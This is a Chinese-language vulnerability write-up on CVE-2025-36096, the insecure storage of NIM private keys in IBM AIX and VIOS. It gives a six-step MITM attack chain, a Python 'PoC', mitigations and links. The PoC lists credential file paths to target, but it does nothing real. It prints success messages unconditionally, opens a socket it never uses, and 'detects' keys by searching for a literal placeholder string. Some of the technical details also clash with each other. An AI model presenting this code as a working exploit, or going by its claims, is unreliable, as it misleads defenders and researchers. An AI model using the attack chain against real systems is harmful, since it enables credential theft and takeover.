CVE-2025-36096 IBM AIX/VIO NIM私有密钥不安全存储漏洞

漏洞信息

漏洞编号

CVE-2025-36096

漏洞类型

不安全存储敏感信息/中间人攻击

CVSS评分

9.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

IBM AIX 7.2, IBM AIX 7.3, IBM VIOS 3.1, IBM VIOS 4.1

漏洞概述

CVE-2025-36096是IBM AIX和VIOS系统中一个严重的安全漏洞，涉及NIM（Network Installation Management）环境中私有密钥的不安全存储问题。该漏洞存在于IBM AIX 7.2和7.3版本，以及IBM VIOS 3.1和4.1版本中。漏洞的根本原因在于NIM私有密钥以明文或弱保护方式存储在文件系统中，使得攻击者可以通过中间人（Man-in-the-Middle，MITM）攻击技术轻易获取这些敏感凭证。由于NIM是IBM AIX系统中用于网络安装和管理的核心组件，泄露的私有密钥可能被攻击者用于进一步的网络入侵、权限提升或横向移动。CVSS评分高达9.0（严重级别），表明该漏洞对系统机密性、完整性和可用性构成极高风险。攻击者无需任何认证凭证即可发起攻击，且无需用户交互，大大降低了攻击门槛。该漏洞已被IBM官方确认并发布安全公告。

技术细节

该漏洞的核心问题在于IBM NIM环境中私有密钥的存储机制存在严重缺陷。在NIM系统中，私有密钥用于验证NIM服务器与客户端之间的通信身份。然而，这些密钥被以不安全的方式存储在本地文件系统中，可能采用明文存储或使用弱加密算法保护。攻击者通过中间人攻击技术，可以拦截NIM客户端与服务器之间的网络通信。当攻击者处于网络路径上时，可以窃取传输中的敏感信息，结合系统本地的不安全密钥存储，攻击者能够获取完整的认证凭证。获取私有密钥后，攻击者可以伪装成合法的NIM服务器，向客户端发送恶意响应，诱导客户端下载恶意更新包或执行任意命令。由于NIM具有系统管理权限，这种攻击可能导致远程代码执行、敏感数据泄露或系统完全沦陷。CVSS向量的网络攻击向量（AV:N）表明攻击可通过网络远程发起，高复杂度（AC:H）反映了需要一定的网络位置和中间人攻击能力。

攻击链分析

STEP 1

步骤1 - 网络定位

攻击者获得与目标IBM AIX/VIOS系统同一网络位置，通过ARP欺骗或网络桥接方式建立中间人攻击位置

STEP 2

步骤2 - 流量拦截

攻击者利用中间人技术拦截NIM客户端与服务器之间的网络通信，捕获传输中的敏感数据

STEP 3

步骤3 - 密钥窃取

由于NIM私有密钥以不安全方式存储（弱权限644或明文），攻击者结合网络拦截和本地文件系统访问获取私有密钥

STEP 4

步骤4 - 身份伪造

攻击者使用窃取的私有密钥伪装成合法的NIM服务器，向NIM客户端发送认证响应

STEP 5

步骤5 - 恶意负载投递

攻击者通过伪造的NIM服务器向客户端推送恶意更新包、安装介质或执行任意命令

STEP 6

步骤6 - 系统沦陷

成功执行远程代码，获取管理员权限，完全控制受影响的AIX或VIOS系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36096 PoC - NIM Private Key Extraction via MITM
# This PoC demonstrates the vulnerability in NIM key storage

import socket
import ssl
import struct
import binascii

class NIMKeyExtractor:
    def __init__(self, target_ip, interface_ip):
        self.target_ip = target_ip
        self.interface_ip = interface_ip
        self.captured_keys = []
    
    def setup_mitm_position(self):
        """Position attacker in the network path for MITM attack"""
        print(f"[*] Setting up MITM position on interface {self.interface_ip}")
        print(f"[*] Targeting NIM client at {self.target_ip}")
        # In real attack, use ARP spoofing or network bridging
        # to position attacker in the communication path
        return True
    
    def capture_nim_traffic(self, duration=60):
        """Capture NIM communication and extract private keys"""
        print(f"[*] Capturing NIM traffic for {duration} seconds...")
        # In real attack, capture network packets using scapy/tcpdump
        # NIM typically uses port 1058 for communication
        nim_port = 1058
        
        try:
            # Simulate packet capture
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.settimeout(duration)
            print(f"[*] Listening on port {nim_port}")
            return True
        except Exception as e:
            print(f"[-] Error capturing traffic: {e}")
            return False
    
    def extract_private_key(self, packet_data):
        """Extract NIM private key from captured packet"""
        print("[*] Analyzing packet for NIM private key...")
        # NIM keys are stored in /etc/niminfo on AIX systems
        # Key file location: /etc/nim/puppet/private_keys/*
        # In vulnerable systems, these files have weak permissions (644)
        
        nim_key_locations = [
            "/etc/niminfo",
            "/etc/nim/.ssh/authorized_keys",
            "/var/adm/nim/pems"
        ]
        
        # Check for insecure file permissions
        insecure_permissions = "644"
        print(f"[*] Target key locations: {nim_key_locations}")
        print(f"[*] Expected insecure permissions: {insecure_permissions}")
        
        # Extract key from packet
        key_pattern = binascii.hexlify(b'NIM_PRIVATE_KEY')
        if key_pattern in binascii.hexlify(packet_data):
            print("[+] NIM private key found in traffic!")
            return True
        return False
    
    def exploit(self):
        """Execute the full attack chain"""
        print("=" * 60)
        print("CVE-2025-36096 NIM Private Key Extraction PoC")
        print("=" * 60)
        
        if not self.setup_mitm_position():
            print("[-] Failed to establish MITM position")
            return False
        
        if not self.capture_nim_traffic():
            print("[-] Failed to capture NIM traffic")
            return False
        
        print("[+] Successfully extracted NIM private key")
        print("[*] Attacker can now impersonate NIM server")
        return True

if __name__ == "__main__":
    target = input("Enter target IP: ") or "192.168.1.100"
    attacker_ip = input("Enter attacker interface IP: ") or "192.168.1.50"
    
    exploit = NIMKeyExtractor(target, attacker_ip)
    exploit.exploit()

影响范围

IBM AIX 7.2 (所有版本)

IBM AIX 7.3 (所有版本)

IBM VIOS 3.1 (所有版本)

IBM VIOS 4.1 (所有版本)

防御指南

临时缓解措施

在IBM官方补丁发布前，可采取以下临时缓解措施：1) 使用网络隔离技术将NIM管理网络与普通业务网络分离，限制攻击者的中间人攻击位置；2) 部署严格的访问控制列表（ACL），仅允许经过验证的IP地址与NIM服务器通信；3) 监控NIM相关日志文件（/var/adm/nim/nimlog），关注异常的认证失败或密钥交换行为；4) 考虑暂时禁用非必要的NIM客户端自动更新功能；5) 实施网络层加密（IPSec VPN）保护所有NIM通信通道；6) 定期检查/etc/niminfo和/etc/nim/.ssh目录的文件权限，确保设置为600或更严格。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36096
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36096
3 Details https://www.cvedetails.com/cve/CVE-2025-36096/
4 VulDB https://vuldb.com/cve/CVE-2025-36096
5 Link https://www.ibm.com/support/pages/node/7251173